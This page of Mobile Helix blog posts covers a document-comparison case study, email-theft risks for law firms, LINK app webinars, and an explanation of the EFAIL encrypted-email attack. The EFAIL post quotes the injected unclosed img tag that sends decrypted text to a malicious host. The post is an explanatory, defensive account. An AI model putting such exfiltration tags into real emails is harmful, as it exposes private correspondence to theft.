Case Study: How Mobile Helix Used compareDocs SDK

How Mobile Helix used compareDocs SDK by DocsCorp to provide accurate document comparison in the LINK App for Lawyers

Mobile Helix, a legal technology solutions provider, used market-leading document comparison technology to meet user expectations for in-app comparison. Since integrating compareDocs SDK through a native .NET API, comparisons in the LINK App for Lawyers are faster and more accurate than ever.

The Business Need

  • Provide end-to-end workflows within the protected container of the encrypted LINK App
  • Improve the accuracy of in-app document comparison with new technology
  • Provide comparison on the server-side, rather than in the cloud
  • Partner with a leader in the legal technology industry

Read the full case study here

Is Your Email Vulnerable? Ask the Chinese Military

Image: ribkhan, Pixabay

I’m a current events junkie. I’ll admit it. And I work with law firms. Thus, my favorite podcast? “Stay Tuned with Preet.” Yes, this is Preet Bharara, the former U.S. Attorney for the Southern District of New York. Check out an episode. Preet takes a few questions about the law at the beginning of each episode. Then he has a guest. Preet is not only smart, but surprisingly personable. It’s a fast-moving hour.

A recent guest was John P. Carlin, former Assistant Attorney General for the National Security Division at the Department of Justice and Chief of Staff to Robert Mueller at the FBI. He is currently a partner with Morrison & Foerster. Carlin is an international cybersecurity expert.

One of the things which caught my attention in this episode was Carlin’s story of the US subsidiary of a German company whose data was stolen by hackers in the Chinese military. The company, SolarWorld, in Hillsboro, Oregon, made solar energy components.

How was the data stolen? Email. Carlin said, “Email. It is the least protected part of the system, usually. Not like Intellectual Property which is encrypted or where special measures are taken to protect it. They stole email traffic.”

Oh. “…the least protected part of the system.” Overwhelmingly true. Carlin said that the Chinese military found data which allowed them to figure out the exact price point of the solar panel components which would cause pain to SolarWorld. The Chinese dumped the China-origin solar energy product, selling at below market prices. Eventually this forced SolarWorld into bankruptcy. They are still operating in Hillsboro today.

John Carlin went on to say, “To add insult to injury, when SolarWorld sued for unfair trade practices, the Chinese military stole the litigation strategy.”

Arghh.

It’s a lesson to us all. Email is not as secure as it must be. Some law firms have a way for attorneys to send encrypted email to clients on as-needed basis. The reality is that these techniques are awkward for both the attorney and the client and are not used as often as they should be.

The day is probably a few years off when much of business email will be encrypted. Encrypted email must become easier to use for both parties for it to be widely adopted.

 But don’t be caught doing nothing. There are straightforward actions which you can take today:

  1. aUse your “trusted sanctuaries,” e.g., in legal technology, Document Management systems. Have a discipline of capturing and recording data in the sanctuary – this allows IT to manage the data.
  2. When possible, send document links, rather than attachments. Ideally send secure links or use Information Rights Management.
  3. Leverage DMS for data classification. Use the classifications to restrict outbound emailing of sensitive data.
  4. Apply pattern-based content filters to avoid emailing Social Security Numbers or other identifiable sensitive data.
  5. Provide education on phishing.

Take-way: Avoid being an example in John Carlin’s next book. 😉

Here’s a link to this episode of Stay Tuned with Preet.

–Maureen Blando is the President and COO of Mobile Helix, makers of the LINK Encrypted App for Lawyers

 

John P. Carlin, cited in the post, is the author of “Dawn of the Code War: America’s Battle Against Russia, China, and the Rising Global Cyber Threat.

ILTA Webinar: Mobile, Secure NetDocuments Workflows: NetDocuments® DMS + LINK Encrypted App

Do you use NetDocuments® DMS today or are you evaluating NetDocuments? If you are looking for an encrypted container app approach for mobile NetDocuments DMS, our LINK app may provide that extra client-side security that you are looking for.

Date and time: Monday, February 11, 2019, Noon EST

Watch a recording of the demo here

Continue reading

What Can You Do With the LINK App?

If a picture is worth a thousand words then a video is worth a few thousand?

Our LINK app is so visual that we like to SHOW what it does. This video shows how LINK enables workflows for lawyers, especially document comparison and annotation.

What Can You Do With the LINK App? 2:22 from LINK App by Mobile Helix on Vimeo.

ILTA Webinar: Edit, Annotate, Compare, Email – DMS Workflows on Your iPad & iPhone

This 30-minute webinar will show you how lawyers view, edit, annotate, compare, and send documents with our LINK app. Date and time: Sept 17, 2018 12:00 PM ET.

register-here-blue

-Full iManage® and NetDocuments® DMS access, check-in, check-out, and search
-Compare an attachment in Email to a document in DMS, edit or annotate, check-in to DMS
-Open a DMS link in Email, view tracked changes, then view with tracked changes accepted
-Use in-app annotation to mark up a document to share with a colleague or client
-Import an attachment into DMS
-Edit with the Word app, check the new document into DMS

LINK 3.5 split screen annotated

LINK’s Split-Screen View of Two Document Versions

LINK gives you easy and secure access to documents in iManage®, NetDocuments®, OneDrive for Business, SharePoint libraries and even in your Home Directory on the firm network.

This 30-minute webinar will be all demo. Join us!

LINK is a secure container app which can be remotely wiped. Data is encrypted at-rest and in-transit. LINK includes built-in Touch ID, Face ID, or PIN code 2F for quick, secure authentication.

register-here-blue

For more information: contact@mobilehelix.com

Our CEO in CSO: Ripped from the headlines – are your messages secure in these encrypted apps?

In the investigations of Paul Manafort and Michael Cohen, the FBI has retrieved messages from Signal, Telegram and WhatsApp. While there are weaknesses inherent in all of these apps, the question remains: What does a good data protection scheme look like?

Read the full article here.  

Secure Email is Cracked; What Now?

cracked pixabay rotated broken-glass-2208593__480

By Seth Hallem, Moble Helix CEO, Co-founder, & Chief Architect

Secure email using S/MIME and OpenPGP is fundamentally broken. Our CEO explains the EFAIL vulnerability and why our LINK Email is not susceptible to EFAIL. What do we do next to protect email? 

On Sunday night, a team of researchers from Germany and Belgium dropped a major bomb on the world of encrypted email by describing a simple, widely applicable, and wildly effective technique for coercing email clients to release encrypted email contents through “Exfiltration channels.”[1] The concept is simple – by using a combination of known manipulation techniques against the encryption algorithms specified in the S/MIME and OpenPGP standards and lax security choices in a wide variety of email clients, the research team was able to intercept and manipulate encrypted emails such that large blocks of the encrypted text are revealed to a malicious server.

What is most brilliant (and most dangerous) about this attack, is that the attack does not require decrypting the email messages or stealing encryption keys. Hence, the attack can be deployed as a man-in-the-middle attack on the infrastructure of the internet itself, rather than requiring that a specific email server or email client is compromised.

The essential idea behind this attack is simple – HTML emails expose a variety of reasons to query remote servers to load parts of those emails. The simplest (and most common) example of this concept is displaying embedded images. Many marketing emails use tiny embedded images to monitor who has opened an email. This technique is so pervasive that many of us have become desensitized to clicking the “Allow images from this sender” prompt in Outlook. It is common practice for marketing emails to contain embedded images with essential content, which encourages users to allow the client to load all images in that message. However, doing so loads both visible images and tiny, single pixel images that marketing tools use to uniquely determine that we have opened the email message in question.

The research team used this concept of HTML exfiltration channels (e.g., loading images from a remote server) to essentially place the encrypted contents of an email inside of an unclosed “img” tag. In other words, by manipulating a block at the start of an email in order to modify its contents to an injected HTML tag of the form <img src=”http://mailicious.my/, the researchers could then ensure that the encrypted blocks containing the secret message were decrypted into the URL path of the unclosed img tag. On the malicious server (e.g., mailicious.my), the URL path is trivially read and, hence, the encrypted data in the email is stolen.

While the basic concept is simple, the details and the level of vulnerability differ by protocol (S/MIME vs. OpenPGP) and email client. OpenPGP has more potential to be free of vulnerability, but that requires a certain set of choices in the implementation of the decryption algorithm in OpenPGP that many email clients have not chosen. In addition, the more click-happy a user is in allowing embedded images to load, the more likely the exploit is to succeed in any arbitrary email client.

What is most alarming about this attack is that there is no simple bug to be fixed, and the presence (or absence) of corporate email security gateways has absolutely no bearing on whether or not the attack will succeed. In summary, secure email using S/MIME and OpenPGP is fundamentally broken. Chances are, it may be fatally broken because upgrading these protocols across the many email clients and security gateways that implement them is an essentially intractable problem.

Our product, LINK, has no particular stake in this game – we do not support S/MIME or OpenPGP on the email client as those protocols are generally implemented at the gateway level in a corporate context. However, LINK does provide one distinct advantage over most email clients – we do strict HTML validation of all emails before downloading them using the OWASP Java HTML sanitizer.[2] Hence, emails with unclosed img tags (leading to the open-ended manipulation of secret data into a URL path) fail sanitization, and the result sent to our email client is an empty message. While it would take a far more extensive investigation to ensure that the LINK email client definitively blocks all possible “exfiltration channels,” the simple examples presented in the paper will not work with LINK email.

Email was never designed with security in mind. Were it designed to be secure, encryption standards like S/MIME and OpenPGP would have been designed into the SMTP protocol itself, rather than layered on top and left to individual clients and gateway solutions to implement with varying degrees of care. However, LINK Email was designed with security in mind and, hence, we are more careful than most about what content we choose to display in the LINK client. However, we have not yet endeavored to solve the problem of end-to-end data protection and integrity for email messages. At the moment, our customers rely on the same gateway solutions that have just proven vulnerable.

When it comes to sending confidential email, S/MIME and OpenPGP, including all of the various gateway solutions that automatically encrypt using those protocols, are no longer safe choices. It is time for enterprises to look to an IRM-based solution, such as Microsoft Azure Rights Management, to protect email using modern encryption that is not vulnerable to the message manipulation technique employed in this exploit. In the long run, the user experience of email is here to stay, but the underlying technology needs to evolve. Security needs to be designed into email transport. Until that happens, email will remain a ripe target for hackers and thieves.

[1] https://efail.de/efail-attack-paper.pdf

[2] https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project